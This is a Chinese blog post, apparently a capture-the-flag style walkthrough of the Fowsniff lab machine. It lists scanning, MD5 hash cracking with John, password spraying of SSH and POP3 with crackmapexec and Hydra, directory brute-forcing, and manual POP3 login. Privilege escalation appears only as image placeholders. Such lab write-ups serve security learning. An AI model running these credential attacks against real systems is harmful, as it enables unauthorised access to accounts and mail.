Fownsniff

最新推荐文章于 2024-11-05 00:01:17 发布
最新推荐文章于 2024-11-05 00:01:17 发布
阅读量47 收藏
点赞数
分类专栏: 红队笔记专栏 文章标签: linux 安全 Linux 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_61427044/article/details/131498988
版权
本文详细介绍了使用Fownsniff进行网络扫描,包括C段扫描、端口扫描、详细信息扫描以及利用John进行MD5哈希破解的过程。此外,还涉及了目录爆破、Hydra工具对POP3服务的验证以及如何与POP3服务器交互进行登录爆破。
摘要由CSDN通过智能技术生成

靶机精讲 之 Fownsniff

[22,80,110,140]
# C段
sudo nmap -sn 192.168.95.0/24

# 端口扫描
sudo nmap -min-rate 10000 -p- 192.168.95.135

# 详细信息扫描
sudo nmap -sT -sV -sC -O -p22,80,110,143 192.168.95.135

# 保存信息收集的内容
sudo vom leaked_data
cat leaked_data
# 哈希破解
hash-identifier xxxxxxxxxx
# john破解[MD5]
sudo john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt leaked_data

# 破解
crackmapexec ssh 192.168.95.135 -u users -p passwords --continue-on-success

# 目录爆破
sudo gobuster dir -u http://192.168.95.135 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

# hydra查看pop3服务
hydra -L users -P passwords -f 192.168.95.135 pop3
# 与pop3交互
sudo nc 192.168.95.135 110

端口扫描

image-20230507150149325

详细信息扫描

image-20230507151011966

查看80端口的界面

image-20230507150344202

信息收集

image-20230507150535899

john破解[MD5]

image-20230507150923725

处理操作

image-20230507151300266

image-20230507151347834

  • 碰撞破解

    image-20230507151429618

目录爆破

image-20230507151926342

hydra 破解[查看pop3信息]

image-20230507152100947

image-20230507152228037

  • 熟悉pop3服务器的语法【与pop3交互】

    pop3 服务器是邮件存储的地方

    image-20230507152431132

爆破登录

image-20230507152941696

提权操作

image-20230507153151552

image-20230507153302797

image-20230507153446143

image-20230507153502167

image-20230507153534861

辉小鱼~
关注
专栏目录
Linux/Unix echo命令
Oo_Amy_oO的博客
11-04 764
echo是 Linux 和 Unix 系统中一个非常基本且常用的命令行工具,用于在终端或文件中显示文本。以下是一些echo在终端显示 “Hello, World!echo $PATH显示环境变量PATH的值。将 “New content” 写入file.txt,如果文件不存在则创建它。将 “Additional content” 追加到file.txt文件的末尾。使用-e选项来解释转义序列(如\n表示换行)。使用-n选项来防止echo命令在输出后添加换行符。echo $?显示上一个命令的退出状态。$(
第三章.Linux文件管理和IO重定向
Raymond的博客
10-30 90
Linux的文件系统分层结构:FHS Filesystem Hierarchy Standard参考文档:http://www.pathname.com/fhs/ 1.3 应用程序的组成部分 1.4 CentOS 7 以后版本目录结构变化 /bin 和 /usr/bin /sbin 和 /usr/sbin /lib 和/usr/lib /lib64 和 /usr/lib64 范例: 1.5 Linux下的文件类型 - 普通文件 d 目录文件directory b 块设备block c 字符设备cha
[linux 驱动]PWM子系统详解
weixin_49406449的博客
11-04 475
搜索“rockchip,rk3328-pwm”,发现在./drivers/pwm/pwm-rockchip.c 出现,所以 pwm6 的驱动是pwm-rockchip。任何 PWM 设备实例都可以被注册到 pwm_class 下,用户空间应用可以通过 /sys/class/pwm 访问这些设备,实现对 PWM 功能的控制。struct pwm_device *pwm: 这是指向 PWM 设备结构体的指针,该结构体是在调用 pwm_request 函数时获取的。这是指向该控制器的 PWM 通道的数组或链表。
Linux 之 信号概念、进程、进程间通信、线程、线程同步
挥剑决浮云的博客
11-01 669
如果释放互斥锁时有一个以上的线程阻塞,那么这些阻塞的线程会被唤醒,它们都会尝试对互斥锁进行加锁,当有一个线程成功对互斥锁上锁之后,其它线程就不能再次上锁了,只能再次陷入阻塞,等待下一次解锁。事实上,子进程是父进程的一个副本,譬如子进程拷贝了父进程的数据段、堆、栈以及继承了父进程打开的文件描述符,父进程与子进程并不共享这些存储空间,这是子进程对父进程相应部分存储空间的完全复制,执行fork()之后,每个进程均可修改各自的栈数据以及堆段中的变量,而并不影响另一个进程。是一族函数,而不是一个单独的函数。
Linux 基础IO
Emilia_is_angel的博客
11-02 803
Linux的文件系统和IO接口进行了简单的介绍
linux-下载抖音作品
qq_64171874的博客
11-04 191
linux中批量下载抖音作品。
Linux】文件系统
weixin_74792326的博客
10-30 802
删一个文件的时候,拿到文件编号,到inode Bitmap里找到文件的inode编号,看它的位图是1说明他是有效的,然后再去inode Table读取它的属性,获得对应的块的块号,在Block Bitmap中将所有块号全部清零,然后再去inode Bitmap里将对应的清0,就完成了文件的删除。每一个inode都有自己的inode编号(inode的设置,是以分区为单位的,不能跨分区) inode表示文件的所有属性,文件名,并不属于inode内的属性。那么,我们怎么知道一个文件的inode编号?
Linux之初体验
枫原万叶的博客
11-04 512
Linux之初体验
linux中网口测试
icon_sunshine的博客
10-31 471
问题:使用ifconfig -a指令返回的网口0信息。
Linux_shell编程
m0_63845988的博客
11-03 638
本文介绍了shell、shell变量、shell字符串、shell反引号的使用、shell命令、shell脚本、shell脚本的执行方式及shell运算方式等
Linux笔记--基础入门
weixin_46729014的博客
10-31 951
​ touch命令本来是用于更新文件的时间标记的,但是在时间使用中经常用于创建新的测试文件,命令使用文件名作为参数,可以创建多个文件,如果创建的文件以及存在,那么更新该文件的时间标记。cd:切换目录 ,如果不指定目录,则跳到宿主目录~," ~ "指的是当前宿主目录,当普通用户输入cd时,则跳转到/home/用户名/中,如果为root用户则指的是/root目录。-l:以长格式显示(long)文件和目录的列表,包括权限、大小,最新的更新时间,不是用-选项是,ls命令默认以短格式显示目录和文件。
RK3568平台开发系列讲解(字符设备驱动篇)Linux设备分类
内核笔记
11-04 184
块设备是有缓冲区,数据下发以后会在缓冲区中缓存。字符设备没有固定的大小,也没有缓冲区,数据会立即被传输。沉淀、分享、成长,让自己和他人都能有所收获!块设备可以被分区,还可以格式化文件系统。
Linux 常用命令
HKJ_numb1的博客
10-23 1138
Linux作为现在世界第一大操作系统,有着开源、稳定、安全、自由、社区支持等优势,想要使用Linux那一定要了解其中的相关命令,本篇文章我就来和大家分享一些Linux 的常见命令,来帮助大家可以快速上手Linux
Linux云计算个人学习总结(二)
weixin_51625382的博客
11-04 356
高级文件系统一、RSYNC概述1、作用:快速的文件复制工具(支持本地和远程),以及删除、查看等基本功能。
Linux】——如何安装g++
m0_73523775的博客
11-03 158
【代码】【Linux】——如何安装g++
linux-应用层操作GPIO
Clear Code
10-31 339
GPIO 同样也是通过 sysfs 方式进行操控,进入到/sys/class/gpio 目录下,
linux8在线扩容/home目录
sqlora的专栏
11-01 834
文件系统 类型 容量 已用 可用 已用% 挂载点。文件系统 类型 容量 已用 可用 已用% 挂载点。文件系统 类型 容量 已用 可用 已用% 挂载点。
linux_c++GDB环境搭建(一)
yunteng521的博客
11-01 854
linux 下c/c++ gdb调试环境 及 core 生产及查看
linux下主IP地址:网络信息不可以(完美解决)
10-31 240
找不到主机的IP地址,并且ping不通外部网络。
VMware 虚拟机使用教程及 Kali Linux 安装指南
最新发布
孤客科技
11-05 959
VMware 是一款虚拟化软件,允许用户在一台物理计算机上创建和管理多个虚拟机。每个虚拟机可以运行不同的操作系统,彼此之间相互独立。资源隔离:每个虚拟机都有独立的操作系统和资源。灵活性:可以轻松创建、删除和克隆虚拟机。安全性:在虚拟环境中测试软件和系统,避免对主机系统的影响。通过本教程,你已经掌握了 VMware 虚拟机的使用方法,并成功安装了 Kali Linux 系统。虚拟化技术为开发、测试和学习提供了极大的便利,建议你深入探索 VMware 的各种功能,提升你的技术能力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值